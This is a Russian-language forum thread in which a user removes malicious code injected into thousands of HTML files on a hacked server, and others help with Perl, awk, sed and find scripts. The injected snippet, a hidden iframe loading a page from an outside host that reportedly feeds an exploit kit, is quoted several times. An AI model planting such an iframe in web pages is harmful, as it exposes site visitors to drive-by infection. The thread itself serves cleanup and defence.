Вирус - самораспространяющаяся вредоносная программа.

Да, напиши небольшой скриптик на перле.

Не знаю Перла! И как со спецсиволами быть там - тем более.

попробовал удалять через tr

Тонко.

unterminated address regex

Тебе какбы говорят, что ты не обозначил диапазон, к которому будет применяться regexp.

В выражении sed надо добавить первым символом /, чтобы регулярка была между слешами.

sed 's/whatever//' file

твой вариант на седе удаляет строки

$ cat clean.pl 
#!/usr/bin/perl -pi.bak
BEGIN{undef $/;
$s=qq{<body><!--c3284d--><script type=«text/javascript»>
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name=«Twitter» scrolling=«auto» frameborder=«no» align=«center» height=«2» width=«2»></iframe>');
</script><!--/c3284d-->};
$l=length $s;
}
substr($_,$i,$l)='<body>' while index($_,$s) != -1;
$ cat test.html 
<html><body><!--c3284d--><script type=«text/javascript»>
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name=«Twitter» scrolling=«auto» frameborder=«no» align=«center» height=«2» width=«2»></iframe>');
</script><!--/c3284d--></body></html>
$ perl clean.pl test.html 
$ cat test.html
<body>84d--></body></html>
$ 

Чуть-чуть недоделал. Где-то 6 байт не учитываются.

cat change_one.sh

#!/bin/sh

D=`dirname "$2"`
mkdir -p "$D"
awk '/<body><!--c3284d--/ {print "<body>"; f=1}; f==0 {print}; /--\/c3284d--/ {f=0};' "$1" > "$2"

вызов:
chmod +x change_one.sh

OD=/old/www/root_dir
ND=/new
mkdir $ND

find $OD -type f -exec ./change_one.sh {} > $ND/{} \;

появится исправленная копия файлов /new/old/www/root_dir/...

Вобщем я не проверял, может где накосячил, так что проверь на копии данных

Устал уже постить этот линк.

[]code[] же!

многих тысячах html-файлов

И да, основная проблема тут по-моему не вирусе.

это не вирус

на дырявой машине
во многих тысячах html-файлов

так понимаю что вариант откатить до предыдущей ревизии в принципе не рассматривается

это лишь статы. я с тобой согласен.

You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML.

Ок.

Ещё хороший пример :)

Вот из-за таких пессимистов как вы, мы до сих пор на Марсе не высадились.
Вы бы сами хоть подумали о смысле написанного по ссылке.
Речь там идёт об неком абстракном произвольном HTML, из внешнего (недоверенного) источника
Если у ТС простой, собственный (т.е. хорошо ему известный и заранее корректный) HTML, то всё там прекрасно парсится

Лень переключаться с User line breaks на TeX paragraphs.

> Устал уже постить этот линк.

а я устал уже его читать… по сцылке сильно устаревшая информация. например, регекспами на перл-5.10+ и перл-6 таки можно парсить (x)html (и получать в результате DOM-дерево, например). правда, там уже не совсем те регекспы, которым учили в школе :)

какие статы?
специальным софтом вставляют ифрейм, с которого льется трафик на связку сплойтов.

Мои глаза!

stats.php

...и заранее корректный...

Хм.

[pre]

Им я и воспользовался.

При наличии возможности работы с файлами в графическом режиме я бы попробовал так: http://wstaw.org/m/2012/07/08/plasma-desktopBQ2530.png

Не сработало, создало один большой файл с именем «{}» в директории «new»!

Я подправил первый скрипт немного для обработки одного файла, он работает. Теперь пробую вызывать его так:

find ./ -name \*html -exec /home/vitaly/one.sh {} > {} \;

Но ничего не выходит, файлы остаются неизменными! Подскажите пожалуйста, где тут ошибка?

Буду разбираться, спасибо! Перла вообще не знаю :((( Поэтому хотел без него обойтись - чтоб запомнить метод решения в подобных случаях. Но если обычные не сработают, буду анализировать и применять Ваш метод с перлом!

Никогда не запускайте `команда $файл > $файл`! Шелл _сначала_ откроет файл и затрёт его, а потом будет запущена программа (и она отработает на пустом файле).

regexxer

python (самое то для хомячков).

Спасибо! А как Вы об этом узнали? Я, как учащийся, интересуюсь, где люди о таких вещах узнают. Наверняка ведь, не от корки до корки читают, а это - не поверхностные вещи!

Сделал так:

find templates -name \*html -exec /home/vitaly/one.sh {} > new/{} \;

Тоже не помогло! В директории new создаётся файл {} (так и называется). Почему так? :(

Плачевным опытом вестимо.

А как Вы об этом узнали?

На опыте. На самом деле это где-то написано, но когда я впервые это попробовал, ничего об этом не знал. Изучите Advanced Bash Scripting Guide, даже если там нет этого, есть куча других полезных вещей.

В директории new создаётся файл {} (так и называется). Почему так? :(

Шелл обрабатывает символ «>» сам.
Получается (с точки зрения шелла): какая-то команда > new/{} ";"
При этом find не видит, что -exec заканчивается ";" или «+», и завершается с ошибкой, а шелл предварительно создаёт этот файл.

Уберите «>», он там вовсе не нужен (перенаправление вывода выполняется внутри скрипта).

ты наркоман.
а мне вчера сказали, что я :(

Вот из-за такой неочевидности и недокументированности эти ваши шеллы нужно закопать.

Спасибо за разъяснения! Очень неочевидно для меня :(((

Проблему решил следующим образом. Создал такой скрипт:

#!/bin/sh
echo "$1"
cp -pf $1 /tmp/virt
sed 's/<body>/<body>\n/' /tmp/virt | sed '/<!--c3284d-->/,/<!--\/c3284d-->/d' > $1
exit 0

И вызывал его так:

find public_html -name \*html -exec /home/vitaly/one.sh {} \;

Такие манипуляции с копированием - чтоб сохранить пермиссии и владельцев файлов!

Вроде бы, всё сработало.

Спасибо и Вам, и другим участникам за помощь!

Кстати, я когда задавал вопрос, думал, что есть уже что-то готовое для такого простого действия как замена куска текста (пусть даже и HTML) во множестве файлов, а выходит, что нет!

Да нет, я не наркоман, с чего Вы взяли?

Просто там сервер погибает, его никто не апдейтил много месяцев! Его уже давно поломали, а они только недавно заметили, когда их Гугл забанил в своём браузере. Я уже написал им, что так делать нельзя, что дырки очень часто находят. А к тому же у них там больше 50 юзеров и явно у кого-то мог протечь пароль.

Уберите «>»

Ага, я же говорил, проверьте сначала всё.

Вот из-за такой неочевидности и недокументированности эти ваши шеллы нужно закопать.

Все очевидно и документировано. Не надо врать.

З.Ы. И что интересно, сегодня когда ехал на работу у меня всплыло в голове это лишнее перенаправление в find, хотя я об этом и не думал и вообще забыл. В который раз поражаюсь работе подсознания.

когда задавал вопрос, думал, что есть уже что-то готовое для такого простого действия как замена куска текста (пусть даже и HTML) во множестве файлов, а выходит, что нет

Есть же, но этой программе надо объяснить что и как удалять и в каких файлах, что и было сделано в этом обсуждении.

Программа, написанная специально для удаления куска текста в HTML-файлах - windows-way. UNIX-way предлагает инструменты, которые можно легко (всего 3 значащих строчки) использовать для удаления текста в HTML-файлах.

Поздравляю!

О вас пишут в газетах: http://www.securitylab.ru/news/426737.php

Да, это оно! И я всё правильно сказал владельцам сервера - надо обновляться регулярно! А они сидят на своём CentOS'е, который в позапрошлый год последний раз обновлялся, и думают, что обновления - это сладострастие!

во многих тысячах html-файлов помещается такое

права на html-файлы конечно же 777? и apache конечно же работает от www?

На некоторых были 777 - я сам шокирован! До чего люди доводят свой сервер! Я ещё только учусь, и то такого бы не совершил. А там, вроде как - американская фирма занималась платной поддержкой, и вот так настроили, представьте!